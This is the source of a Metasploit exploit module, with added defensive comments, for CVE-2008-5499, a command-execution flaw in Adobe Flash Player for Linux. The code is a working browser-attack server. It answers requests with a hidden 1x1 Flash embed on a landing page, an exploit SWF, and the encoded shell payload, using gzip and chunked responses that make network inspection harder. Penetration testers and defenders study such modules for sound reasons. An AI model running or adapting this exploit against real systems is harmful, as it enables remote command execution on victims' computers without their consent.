GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
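# Metasploit browser-exploit module for CVE-2008-5499 (Adobe Flash Player for
# Linux, command execution through the ActionScript launch method; the
# referenced vendor bulletin is APSB08-24).
#
# Flow visible in this file: #exploit loads a prebuilt SWF from the framework
# data directory, then #on_request_uri answers three kinds of request -- a
# landing page that embeds the SWF, the SWF itself, and a text/plain response
# carrying the encoded payload.
#
# Defensive notes:
# * Exposure is limited to the Flash Player versions named in the description,
#   and the description states that Adobe AIR must also be installed. Flash
#   Player as a whole is end-of-life, so removing the plugin closes the issue.
# * The landing page embeds a 1x1 Flash object with allowNetworking="all" whose
#   movie URL ends in 3-8 random letters plus ".swf"; the same listener also
#   answers ".txt" requests with text/plain.
# * Responses default to gzip compression with chunked transfer encoding, so
#   network inspection has to decode both before the HTML/SWF body is visible.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata (name, description, references, default
  # options, platform/arch and targets) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in Adobe Flash Player for Linux,
          version 10.0.12.36 and 9.0.151.0 and prior.
          An input validation vulnerability allows command execution when the browser
          loads a SWF file which contains shell metacharacters in the arguments to
          the ActionScript launch method.

          The victim must have Adobe AIR installed for the exploit to work. This module
          was tested against version 10.0.12.36 (10r12_36).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
          ],
        'References' =>
          [
            ['CVE', '2008-5499'],
            ['OSVDB', '50796'],
            ['BID', '32896'],
            ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']
          ],
        # Served responses are gzip-compressed and chunked by default.
        'DefaultOptions' =>
          {
            'HTTP::compression' => 'gzip',
            'HTTP::chunked' => true
          },
        'Platform' => 'unix', # so unix cmd exec payloads are ok
        'Arch' => ARCH_CMD,
        'Targets' =>
          [
            [ 'Automatic', {}],
          ],
        'DisclosureDate' => '2008-12-17',
        'DefaultTarget' => 0
      )
    )
  end

  # Loads the prebuilt SWF into @swf, then hands control to the parent
  # implementation of #exploit.
  #
  # @raise [SystemCallError] if the SWF is missing or unreadable
  def exploit
    swf_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')

    # File.binread opens, reads and closes in a single call, so no file handle
    # is left open if the read raises part-way through.
    @swf = File.binread(swf_path)

    super
  end

  # Answers one HTTP request from a connecting browser.
  #
  # Dispatch is by substring match on the request URI (the patterns are not
  # anchored, so ".swf"/".txt" anywhere in the URI selects that branch):
  # * ".swf" -> the SWF loaded by #exploit, as application/x-shockwave-flash
  # * ".txt" -> payload.encoded, as text/plain
  # * anything else -> an HTML page embedding the SWF under a random name
  #
  # @param cli the client connection; used for the peer address and the response
  # @param request the parsed HTTP request; only its uri is read here
  def on_request_uri(cli, request)
    msg = "#{cli.peerhost.ljust(16)} #{shortname}"

    # Both identifiers are 3-8 random letters, regenerated on every request.
    trigger_file = rand_text_alpha(rand(6) + 3) + '.swf'
    obj_id = rand_text_alpha(rand(6) + 3)

    if request.uri.match(/\.swf/i)
      print_status("#{msg} Sending Exploit SWF")
      send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    if request.uri.match(/\.txt/i)
      # NOTE(review): presumably fetched by the SWF itself; nothing in this
      # file references a .txt URL -- confirm against the SWF source.
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
      return
    end

    # Landing page: a 1x1 <object>/<embed> pair pointing at the random SWF name.
    html = <<~EOS
      <html>
      <head>
      </head>
      <body>
      <center>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
      <param name="movie" value="#{get_resource}#{trigger_file}" />
      <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
      type="application/x-shockwave-flash"
      pluginspage="http://www.macromedia.com/go/getflashplayer">
      </embed>

      </object>
      </center>

      </body>
      </html>
    EOS

    print_status("#{msg} Sending HTML...")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end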